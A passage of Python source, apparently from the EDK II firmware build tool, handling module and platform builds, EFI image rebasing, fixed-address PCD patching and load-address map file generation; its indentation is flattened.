EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
return True
# run
if Target == 'run':
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
if GlobalData.gBinCacheSource:
EdkLogger.quiet("cache hit: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
continue
else:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("cache miss: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
# Initialize all modules in tracking to 'FAIL'
if Ma.Arch not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma.Arch] = dict()
if Ma not in GlobalData.gModuleBuildTracking[Ma.Arch]:
GlobalData.gModuleBuildTracking[Ma.Arch][Ma] = 'FAIL'
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
self.invalidateHash()
def _GenFfsCmd(self,ArchList):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
if GlobalData.gBinCacheSource:
EdkLogger.quiet("cache hit: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
continue
else:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("cache miss: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
# Initialize all modules in tracking to 'FAIL'
if Ma.Arch not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma.Arch] = dict()
if Ma not in GlobalData.gModuleBuildTracking[Ma.Arch]:
GlobalData.gModuleBuildTracking[Ma.Arch][Ma] = 'FAIL'
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
self.invalidateHash()
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.items():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
